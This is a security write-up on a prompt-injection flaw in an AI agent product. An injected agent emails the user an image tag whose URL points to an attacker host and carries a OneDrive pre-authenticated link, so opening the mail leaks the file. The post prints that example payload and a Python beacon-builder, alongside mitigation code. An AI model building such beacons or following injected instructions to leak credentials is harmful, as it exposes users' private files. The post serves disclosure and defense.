Microsoft Copilot Cowork Exfiltrates Files via Email Rendering

Microsoft Copilot Cowork shipped with a vulnerability that turns agent-to-user notifications into a data exfiltration channel. The attack surface is not the tool call itself but the rendering context where the agent’s output appears.

The vulnerability combines three architectural decisions:

Agents can send emails to the user’s inbox without approval
Those emails render external images that trigger network requests
OneDrive pre-authenticated download links can be embedded in the message body

When a prompt injection succeeds, the agent generates an email containing an image tag pointing to an attacker-controlled domain. The URL includes a OneDrive pre-authenticated link as a query parameter. When the user opens the email, their mail client fetches the image and leaks the file access token to the attacker.

This is not a theoretical attack. It affected a shipping enterprise product.

The Lethal Trifecta in Production

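Simon Willison’s “lethal trifecta” describes an agent that combines three things: access to private data, exposure to untrusted content, and the ability to communicate externally. Copilot Cowork had all three: file access, injected instructions, and an unapproved email channel. Most agent security writing focuses on the first two. The third is where the exfiltration actually happens, and here it runs through the display layer.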

The flow:

Attacker injects a prompt via a document, email, or web page the agent processes
Agent generates a message with embedded external image: <img src="https://attacker.com/log?token=https://onedrive.live.com/download?cid=ABC123&authkey=XYZ">
Agent calls the “send email to user” tool (no approval required)
User opens email in Outlook or webmail
Mail client fetches the image, sending the OneDrive token to the attacker
Attacker downloads the file using the leaked pre-authenticated link

The agent never directly calls a “send file to external server” tool. It uses an approved notification channel and relies on the email client’s rendering behavior to complete the exfiltration.
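To make the mechanism concrete, here is a minimal sketch of why a single image fetch is enough to hand over the link. The collector host `attacker.example` and both helper functions are hypothetical, and the OneDrive link is the placeholder from the flow above. The inline example is shown unencoded for readability; a working payload would percent-encode the nested URL, which is what this sketch assumes.

```python
from urllib.parse import parse_qs, urlencode, urlsplit

# Placeholder values for illustration only.
PRE_AUTH_LINK = "https://onedrive.live.com/download?cid=ABC123&authkey=XYZ"
COLLECTOR = "https://attacker.example/log"


def build_beacon_url(collector: str, secret: str) -> str:
    """Embed the secret as a percent-encoded query parameter of an image URL."""
    return f"{collector}?{urlencode({'token': secret})}"


def recover_secret(requested_url: str) -> str:
    """Decode the secret from the request line a collector would log."""
    query = parse_qs(urlsplit(requested_url).query)
    return query["token"][0]


beacon = build_beacon_url(COLLECTOR, PRE_AUTH_LINK)
# The mail client only has to request `beacon`; the full link is in the URL.
assert recover_secret(beacon) == PRE_AUTH_LINK
```

Nothing in the request body or headers matters here. The credential travels in the URL itself, so any component that fetches the image completes the leak.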

Permission Boundary Confusion

The core failure is treating “notify user” and “act on behalf of user” as the same permission tier.

Agents typically have three communication modes:

Mode	Approval	Rendering	Exfiltration Risk
Internal response	None	Sandboxed UI	Low (if sandbox enforces CSP)
Notification to user	None	Full email/Slack rendering	High (external images, links)
Outbound message	Required	N/A (user reviews before send)	Low (user sees content)

Copilot Cowork treated the second mode (notification to user) like the first (internal response). The agent could send emails without approval because they were “just notifications.” But those notifications rendered in a full email client with external resource loading enabled.
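One way to keep the tiers from blurring is to key the approval decision on where the content renders rather than on who receives it. The sketch below is an assumption about how such a policy could be encoded; the `Channel` names and `requires_approval` are illustrative and not taken from any Microsoft API.

```python
from enum import Enum


class Channel(Enum):
    INTERNAL_RESPONSE = "internal_response"   # renders in the agent's sandboxed UI
    USER_NOTIFICATION = "user_notification"   # renders in email, Slack, and similar
    OUTBOUND_MESSAGE = "outbound_message"     # sent on behalf of the user


# Channels whose content is rendered by software the agent platform does not control.
UNSANDBOXED = frozenset({Channel.USER_NOTIFICATION, Channel.OUTBOUND_MESSAGE})


def requires_approval(channel: Channel) -> bool:
    """Approval depends on the rendering context, not on the recipient."""
    return channel in UNSANDBOXED
```

Under this policy a notification to the user's own inbox lands in the same tier as an outbound message, which is the distinction the shipped product missed.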

The fix requires at least one of the following:

Sandboxing agent-generated emails (strip external images, disable link previews)
Requiring approval for any message that leaves the agent’s controlled UI
Treating “send email to user” as equivalent to “send email on behalf of user”
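The first option can be sketched with Python's standard `html.parser`. This is a minimal illustration, not a complete sanitizer: the tag and attribute lists are assumptions, it does not handle event-handler attributes or `javascript:` links, and a production system should rely on a maintained sanitization library.

```python
from html import escape
from html.parser import HTMLParser

# Elements that can trigger a network request on render; dropped entirely.
BLOCKED_TAGS = {"img", "link", "script", "style", "iframe", "object", "embed"}
# Elements whose text content is dropped along with the tag.
DROP_CONTENT = {"script", "style"}
# Attributes that can carry auto-loading URLs (for example CSS url()).
BLOCKED_ATTRS = {"style", "background", "srcset"}


class ExternalContentStripper(HTMLParser):
    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)
        self.out: list[str] = []
        self._drop_depth = 0

    def _emit_start(self, tag, attrs):
        kept = "".join(
            f' {name}="{escape(value or "", quote=True)}"'
            for name, value in attrs
            if name not in BLOCKED_ATTRS
        )
        self.out.append(f"<{tag}{kept}>")

    def handle_starttag(self, tag, attrs):
        if tag in DROP_CONTENT:
            self._drop_depth += 1
        if tag in BLOCKED_TAGS or self._drop_depth:
            return
        self._emit_start(tag, attrs)

    def handle_startendtag(self, tag, attrs):
        # Self-closing form such as <br/>: emit once, never open a drop region.
        if tag in BLOCKED_TAGS or self._drop_depth:
            return
        self._emit_start(tag, attrs)

    def handle_endtag(self, tag):
        if tag in DROP_CONTENT:
            self._drop_depth = max(0, self._drop_depth - 1)
            return
        if tag in BLOCKED_TAGS or self._drop_depth:
            return
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._drop_depth:
            self.out.append(escape(data, quote=False))


def strip_external_content(html: str) -> str:
    """Re-serialize the HTML without auto-loading elements or attributes."""
    parser = ExternalContentStripper()
    parser.feed(html)
    parser.close()
    return "".join(parser.out)
```

Ordinary links survive this pass because they only fire when the user clicks. Images, stylesheets, and inline styles are removed because the mail client would fetch them on open.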

Pre-Authenticated Links as Exfiltration Primitives

OneDrive and SharePoint generate pre-authenticated download links for sharing. These tokens are bearer credentials: anyone with the URL can download the file.

When an agent has permission to do all of the following, you have an exfiltration path:

Read files from OneDrive
Generate sharing links
Send messages to external channels

The agent doesn’t need to upload the file anywhere. It just needs to generate a link and send it somewhere the attacker can observe.

This applies to any cloud storage with pre-authenticated URLs:

AWS S3 presigned URLs
Google Cloud Storage signed URLs
Azure Blob Storage SAS tokens
Dropbox shared links

The mitigation is not to block link generation. It’s to ensure that any action that creates a bearer credential and transmits it outside the agent’s sandbox requires explicit user approval.
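A gate like that needs some way to recognize a bearer URL in outbound content. The sketch below is one heuristic under stated assumptions: it looks for the signature query parameters used by S3 presigned URLs (`X-Amz-Signature`), Google Cloud Storage signed URLs (`X-Goog-Signature`), and Azure SAS tokens (`sig`), plus the `authkey` parameter from this article's OneDrive example. The function name and the recursion limit are hypothetical, and a parameter-name match is a signal for review, not proof.

```python
from urllib.parse import parse_qsl, urlsplit

# Query parameter names (lowercased) that commonly mark a URL as a bearer credential.
SIGNATURE_PARAMS = {
    "x-amz-signature",   # AWS S3 presigned URL (Signature Version 4)
    "x-goog-signature",  # Google Cloud Storage V4 signed URL
    "sig",               # Azure Storage shared access signature
    "authkey",           # OneDrive link format used in this article's example
}


def contains_bearer_credential(url: str, max_depth: int = 3) -> bool:
    """True if the URL, or a URL nested in one of its query values, is signed."""
    if max_depth <= 0:
        return False
    pairs = parse_qsl(urlsplit(url).query, keep_blank_values=True)
    if any(name.lower() in SIGNATURE_PARAMS for name, _ in pairs):
        return True
    # The attack wraps the signed link inside another URL, so inspect values too.
    return any(
        contains_bearer_credential(value, max_depth - 1)
        for _, value in pairs
        if value.startswith(("http://", "https://"))
    )
```

Checking nested values matters because the signed link rarely appears at the top level in this attack. It rides inside the query string of the attacker's image URL.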

Rendering Context as Attack Surface

Email clients are designed to render rich content. That means:

External images load automatically in many clients (unless the user or an administrator has disabled them)
Link previews fetch metadata from target URLs
Tracking pixels are standard practice
CSS can trigger network requests via url() references

When you display agent-generated content in an email client, you inherit all of these behaviors. The agent doesn’t need to exploit a vulnerability in the email client. It just needs to use standard HTML features.

The same risk exists for:

Slack messages (link previews, image embeds)
Microsoft Teams (similar rendering)
Browser notifications (if they allow rich content)
Mobile push notifications (if they fetch images)

If your agent can send content to any of these channels without approval, and that content can reference external resources, you have an exfiltration vector.

Approval Flow Patterns

The fix is to distinguish between:

Display to user in controlled context: Agent UI, sandboxed iframe, CSP-enforced page
Transmit to user via external channel: Email, Slack, SMS, push notification

For the second category, you need approval before the message leaves your infrastructure. The approval UI should:

Show the full message content including all links and image URLs
Highlight any external domains referenced
Display any file access tokens or credentials embedded in the content
Require explicit confirmation before sending
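The data behind such an approval screen can be gathered with a single pass over the message HTML. The following is a rough sketch: `TRUSTED_DOMAINS`, `ApprovalSummary`, and `summarize_for_approval` are hypothetical names, the allowlist matches exact hostnames only, and the set of auto-loading tags is an assumption.

```python
from dataclasses import dataclass
from html.parser import HTMLParser
from urllib.parse import urlsplit

TRUSTED_DOMAINS = frozenset({"contoso.example"})  # hypothetical allowlist
AUTO_LOADING_TAGS = {"img", "link", "iframe", "script"}  # fetched without a click


class UrlCollector(HTMLParser):
    """Collect (tag, url) pairs from src and href attributes."""

    def __init__(self) -> None:
        super().__init__()
        self.urls: list[tuple[str, str]] = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name in {"src", "href"} and value:
                self.urls.append((tag, value))


@dataclass
class ApprovalSummary:
    all_urls: list[str]
    external_domains: set[str]
    auto_loading_urls: list[str]


def summarize_for_approval(html: str, trusted=TRUSTED_DOMAINS) -> ApprovalSummary:
    collector = UrlCollector()
    collector.feed(html)
    collector.close()
    external: set[str] = set()
    auto_loading: list[str] = []
    for tag, url in collector.urls:
        host = urlsplit(url).hostname
        if host and host not in trusted:  # exact match only; subdomains count as external
            external.add(host)
        if tag in AUTO_LOADING_TAGS:
            auto_loading.append(url)
    return ApprovalSummary([u for _, u in collector.urls], external, auto_loading)
```

Separating auto-loading URLs from clickable ones lets the approval UI put the riskiest references first, since those fire as soon as the message is opened.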

This is expensive in terms of user friction. But the alternative is treating every notification channel as a potential data leak.

Implementation Checklist

If you’re building an agent that can send messages:

Sandbox agent responses: Use CSP to block external resources in your UI
Strip external content: Remove <img>, <link>, and <script> tags, along with CSS url() references, from agent-generated messages before displaying them
Require approval for external channels: Treat email, Slack, SMS as high-privilege actions
Audit pre-authenticated link generation: Log every time an agent creates a sharing link or presigned URL
Monitor outbound requests: Alert when agent-generated content triggers external network requests
Rate-limit notifications: Cap how many emails/messages an agent can send per hour

The last point matters because even with approval, a compromised agent can spam the user with approval requests until they click through without reading.
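A sliding-window counter is one simple way to enforce that cap. This is a minimal single-process sketch; the class name, the one-hour default, and the injectable clock are assumptions, and a multi-instance deployment would need shared state.

```python
import time
from collections import deque


class NotificationRateLimiter:
    """Allow at most `max_per_window` sends in any rolling window."""

    def __init__(self, max_per_window: int, window_seconds: float = 3600.0,
                 clock=time.monotonic) -> None:
        self.max_per_window = max_per_window
        self.window_seconds = window_seconds
        self._clock = clock
        self._sent: deque[float] = deque()

    def allow(self) -> bool:
        now = self._clock()
        # Forget sends that have aged out of the window.
        while self._sent and now - self._sent[0] >= self.window_seconds:
            self._sent.popleft()
        if len(self._sent) >= self.max_per_window:
            return False
        self._sent.append(now)
        return True
```

Applying the same limiter to approval prompts, not only to delivered messages, addresses the click-through fatigue described above.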

Technical Verdict

Use agent-to-user notifications when:

Messages render in a sandboxed UI you control
External resources are blocked by CSP
The agent cannot generate bearer credentials (pre-authenticated links)

Require approval when:

Messages render in email clients, Slack, or other external channels
Content may include external images or links
The agent has permission to generate file sharing links

Avoid entirely when:

You cannot sandbox the rendering context
The agent has broad file access and can generate pre-authenticated URLs
User approval flows are not practical for your use case

The Copilot Cowork vulnerability shows that even major vendors get this wrong. The attack surface is not just the tools you give the agent. It’s also where the agent’s output gets displayed and what network requests that display context will make on behalf of the user.

Source Links

Microsoft Copilot Cowork Exfiltrates Files (Simon Willison)